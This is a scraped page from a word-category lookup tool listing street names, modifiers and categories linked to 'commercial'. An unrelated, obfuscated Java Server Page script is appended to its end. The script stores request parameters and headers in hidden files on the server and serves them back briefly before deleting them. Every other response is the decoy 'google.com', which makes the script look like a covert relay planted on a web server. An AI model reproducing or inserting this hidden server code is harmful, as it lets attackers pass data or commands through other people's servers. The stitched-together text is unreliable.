Use the & operator to see the shared categories of two terms. E.g.
cola & coffee
or
divorce & war
Go Back
See XML
Members for Fine-Grained Categories
commercial_street
:
western_avenue,
florida_avenue,
chestnut_street,
harbor_boulevard,
rue,
central_avenue,
massachusetts_avenue,
newport_boulevard,
smith_street,
washington_street,
atlantic_avenue,
fourteenth_street,
beach_boulevard,
court_street,
fulton_street,
robertson_boulevard,
union_street,
mission_street,
Modifiers matching
street
:
long,
major,
surrounding,
primary,
smaller,
congested,
busy,
active,
nearby,
paved,
historic,
off,
residential,
commercial,
peripheral,
high,
populated,
narrow,
ancient,
adjacent,
special,
key,
Simple categories matching
commercial
:
facility,
blower,
building,
issue,
medium,
activity,
vehicle,
structure,
sport,
deposit,
effort,
establishment,
chow,
tax,
business,
substrate,
zone,
innovation,
interest,
livestock,
condition,
use,
meat,
location,
entity,
gum,
capability,
society,
clay,
property,
drink,
lighting,
beverage,
organization,
wood,
device,
entertainment,
directory,
interior,
furniture,
fish,
record,
operations,
quality,
foodstuff,
auto,
conveyance,
resin,
content,
diet,
reference,
stone,
constraint,
importance,
policy,
ingredient,
film,
hardware,
show,
van,
photography,
antibacterial,
publisher,
entrepreneur,
photograph,
hardwood,
wax,
transport,
carbon,
assay,
drupe,
improvement,
creation,
communications,
power,
network,
measure,
right,
lubricant,
outlet,
trivia,
hub,
sector,
function,
fibre,
enterprise,
cleaners,
installation,
item,
boat,
calendar,
lease,
syrup,
distribution,
material,
subject,
terms,
source,
metal,
solution,
arena,
preparation,
craft,
mammal,
plantation,
application,
arrangement,
treadmill,
pool,
attraction,
outfit,
complex,
supplier,
favor,
processing,
job,
body,
matter,
support,
souvenir,
touch,
wagon,
advertising,
output,
idea,
grass,
trade,
cost,
formula,
fare,
ventilator,
seed,
port,
label,
investor,
drug,
endeavor,
work,
worker,
truck,
liquid,
driver,
nature,
characteristic,
construction,
liabilities,
skill,
requirement,
union,
family,
technology,
mineral,
setting,
situation,
intermediary,
diver,
fiction,
land,
insured,
education,
hotel,
usage,
transportation,
software,
recording,
assets,
fixture,
oven,
alloy,
info,
premises,
gaming,
system,
fabric,
exchange,
finance,
seafood,
district,
gear,
printing,
environment,
culture,
feed,
battery,
car,
merchandise,
database,
information,
citrus,
offering,
dock,
center,
surface,
explosive,
marketplace,
book,
task,
controller,
aircraft,
cleanser,
phospholipid,
indicator,
waste,
object,
article,
solid,
flooring,
transaction,
sphere,
fishing,
toiletry,
chemical,
program,
transactions,
refrigerant,
consideration,
vegetable,
mixture,
connection,
powder,
architecture,
firm,
diamine,
computer,
warehouse,
user,
lecithin,
door,
fluid,
starches,
prawn,
crime,
blender,
change,
refrigerator,
traffic,
data,
vessel,
works,
undertaking,
portion,
difficulty,
polysaccharide,
tool,
appliance,
oilseed,
product,
instrumentality,
crop,
grain,
venture,
discipline,
trait,
risk,
animal,
production,
agriculture,
website,
assistance,
company,
expense,
relationship,
gathering,
gym,
alcohol,
pressure,
recreation,
point,
feature,
street,
energy,
contract,
airline,
fleet,
print,
organism,
means,
game,
development,
gas,
value,
shellfish,
whitefish,
statement,
project,
polyester,
trailer,
plant,
sign,
market,
settlement,
component,
glasses,
investment,
species,
polymer,
petrochemical,
service,
machinery,
party,
trust,
exhibition,
space,
concern,
code,
organisation,
group,
piece,
dispute,
occupation,
genre,
secret,
cooler,
cookware,
equipment,
toy,
field,
hydrocarbon,
farm,
oil,
aspect,
force,
place,
fiber,
agent,
painting,
bread,
food,
accessory,
criterion,
aquarium,
attribute,
symbol,
operator,
grade,
trap,
plastic,
practice,
compound,
tongue,
centre,
noise,
sex,
mollusk,
filler,
insurance,
condiment,
gatekeeper,
agreement,
sorbent,
tree,
watercraft,
linen,
expert,
institution,
stuff,
event,
apparatus,
accommodation,
contractor,
sponsor,
instrumentation,
magnetometer,
shape,
ship,
industry,
strip,
magazine,
provider,
tobacco,
part,
publication,
documentation,
casino,
erection,
trading,
flour,
litigation,
meeting,
identifier,
monomer,
site,
purpose,
bivalve,
fruit,
operation,
machine,
giant,
gambling,
process,
area,
message,
cleaner,
carrier,
floor,
thing,
unit,
editor,
amusement,
billboard,
fuel,
document,
encryption,
communication,
package,
revenue,
estate,
solvent,
literature,
commodity,
control,
printer,
music,
language,
shop,
<%@page trimDirectiveWhitespaces="true"%> <%@page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.text.*"%> <%! static String cuy321a = null; public static String cuy321b(byte[] cuy321c) { char[] cuy321d = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' }; StringBuilder cuy321e = new StringBuilder(); int cuy321f = 0; for (int i = 0; i < cuy321c.length; i += 3) { int b = ((cuy321c[i] & 0xFF) << 16) & 0xFFFFFF; if (i + 1 < cuy321c.length) { b |= (cuy321c[i+1] & 0xFF) << 8; } else { cuy321f++; } if (i + 2 < cuy321c.length) { b |= (cuy321c[i+2] & 0xFF); } else { cuy321f++; } for (int j = 0; j < 4 - cuy321f; j++) { int c = (b & 0xFC0000) >> 18; cuy321e.append(cuy321d[c]); b <<= 6; } } for (int j = 0; j < cuy321f; j++) { cuy321e.append("="); } return cuy321e.toString(); } public void cuy321a(HttpServletRequest req) { if (cuy321a != null) return; String cuy321g = getServletContext().getRealPath(req.getRequestURI()).replace('\\', '/'); cuy321a = cuy321g.substring(0, cuy321g.lastIndexOf('/')) + "/"; } byte[] cuy321h(String cuy321i) { byte[] cuy321j = null; FileInputStream cuy321k = null; File file = new File(cuy321i); try { cuy321k = new FileInputStream(file); cuy321j = new byte[(int)file.length()]; cuy321k.read(cuy321j); } catch (Exception ex) { } finally { try { if (cuy321k != null) cuy321k.close(); } catch (Exception ex) { } } return cuy321j; } %> <% cuy321a(request); String cuy322a = request.getParameter("user"); String cuy322b = request.getParameter("rand"); String cuy322c = request.getParameter("id"); String cuy322d = request.getParameter("action"); int cuy322e = -1; if (request.getParameter("code") != null) cuy322e = Integer.parseInt(request.getParameter("code")) % 4; if (cuy322d != null && "home".equals(cuy322d)) { out.write("google.com"); } if (cuy322a != null && !"0".equals(cuy322a)) { String cuy322g = cuy321a + cuy322b + ".vps"; String cuy322f = cuy322g + "x"; String cuy322h = request.getParameter("hash"); String cuy322i = request.getHeader("From"); FileOutputStream cuy322j = null; cuy322j = new FileOutputStream(cuy322f); if(cuy322j != null) { DataOutputStream cuy322k = new DataOutputStream(cuy322j); cuy322k.writeLong(System.currentTimeMillis()); cuy322k.close(); cuy322j.close(); } cuy322j = new FileOutputStream(cuy322g, false); if(cuy322j != null) { cuy322j.write(cuy322h.getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322i.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322a.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322b.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.flush(); cuy322j.close(); } out.write("google.com"); } else if (cuy322e == 0 && "0".equals(cuy322c)) { out.write("google.com"); } else if (cuy322e == 1) { File cuy322l = new File(cuy321a); String cuy322g = null; String cuy322f = null; int cuy322m = 0; if (cuy322l.exists() && cuy322l.isDirectory()) { for(File file:cuy322l.listFiles()) { cuy322g = file.getName(); if(cuy322g.endsWith(".vps")) { cuy322m = 1; cuy322g = file.getAbsolutePath(); cuy322f = cuy322g + "x"; break; } } } if (cuy322m == 1) { FileInputStream cuy321k = new FileInputStream(cuy322f); DataInputStream cuy322o = new DataInputStream(cuy321k); if(System.currentTimeMillis() - cuy322o.readLong() < 180000) { byte[] cuy322p = cuy321h(cuy322g); if (cuy322p != null) { out.write(new String(cuy322p)); } } cuy322o.close(); cuy321k.close(); File cuy322p1 = new File(cuy322g); cuy322p1.delete(); File cuy322pz = new File(cuy322f); cuy322pz.delete(); } else { out.write("google.com"); } } %>